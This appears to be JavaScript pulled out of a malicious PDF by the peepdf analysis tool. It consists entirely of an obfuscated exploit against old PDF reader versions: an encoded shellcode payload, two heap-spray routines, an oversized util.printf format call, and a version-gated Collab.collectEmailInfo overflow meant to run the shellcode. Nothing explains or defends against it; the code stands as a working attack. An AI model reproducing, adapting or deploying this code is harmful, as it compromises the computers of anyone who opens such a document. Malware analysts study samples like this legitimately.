// peepdf comment: Javascript code located in object 7 (version 0)

CTqyqclT5 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1");
var s5xZgaHCe4lH = unescape("%u0A0A%u0A0A");
var nm = 20;
var fg = nm + CTqyqclT5.length;
while (s5xZgaHCe4lH.length < fg) s5xZgaHCe4lH += s5xZgaHCe4lH;
var nmbr = s5xZgaHCe4lH.substring(0, fg);
var stig = s5xZgaHCe4lH.substring(0, s5xZgaHCe4lH.length - fg);
while (stig.length + fg < 0x60000) stig = stig + stig + nmbr;
var arrm = new Array();
for (iz = 0; iz < 1200; iz++) {
    arrm[iz] = stig + CTqyqclT5
}
var hPxr4 = "129" + "99999999" + "99999" + "9999" + "8888888" + "888888888888888888888888888888" + "88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888" + "888888888888888888888888888888888888888888" + "88888888888888888888888888888888888" + "8888888888888" + "8888888888888888888" + "88888888888888";
util.printf("%45000f", hPxr4);

function xI6oGwsuj() {
    var RIeSaq7dbOU3r = new Array();

    function BixmC(vbLuQbrJVaGMt, uTkv7MKaOCvQu) {
        while (vbLuQbrJVaGMt.length * 2 < uTkv7MKaOCvQu) {
            vbLuQbrJVaGMt += vbLuQbrJVaGMt;
        }
        vbLuQbrJVaGMt = vbLuQbrJVaGMt.substring(0, uTkv7MKaOCvQu / 2);
        return vbLuQbrJVaGMt;
    }

    function H7v2iGv() {
        var smSNNjkGeZjPV = 0x0c0c0c0c;
        var qqRA3NaxGn5C = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1");
        var xuBal = 0x400000;
        var ZC8SZiPqV = qqRA3NaxGn5C.length * 2;
        var uTkv7MKaOCvQu = xuBal - (ZC8SZiPqV + 0x38);
        var vbLuQbrJVaGMt = unescape("%u9090%u9090");
        vbLuQbrJVaGMt = BixmC(vbLuQbrJVaGMt, uTkv7MKaOCvQu);
        var KKGV5 = (smSNNjkGeZjPV - 0x400000) / xuBal;

        for (var oSkvLXOju9UA = 0; oSkvLXOju9UA < KKGV5; oSkvLXOju9UA++) {
            RIeSaq7dbOU3r[oSkvLXOju9UA] = vbLuQbrJVaGMt + qqRA3NaxGn5C;
        }
    }

    function SbbZWj4gV8bhh() {
        var B9Ymb9U2y1V = app.viewerVersion.toString();
        B9Ymb9U2y1V = B9Ymb9U2y1V.replace(/\D/g, "");
        var xlWOyM1Z = new Array(B9Ymb9U2y1V.charAt(0), B9Ymb9U2y1V.charAt(1), B9Ymb9U2y1V.charAt(2));
        if ((xlWOyM1Z[0] == 8 && ((xlWOyM1Z[1] == 1 && xlWOyM1Z[2] < 2) || xlWOyM1Z[1] < 1)) || (xlWOyM1Z[0] == 7 && xlWOyM1Z[1] < 1) || (xlWOyM1Z[0] < 7)) {
            H7v2iGv();
            var JI1Eo8pWpC = unescape("%u0c0c%u0c0c");
            while (JI1Eo8pWpC.length < 44952) JI1Eo8pWpC += JI1Eo8pWpC;
            this.collabStore = Collab.collectEmailInfo({
                subj: "",
                msg: JI1Eo8pWpC
            });
        }
    }
    SbbZWj4gV8bhh();
}

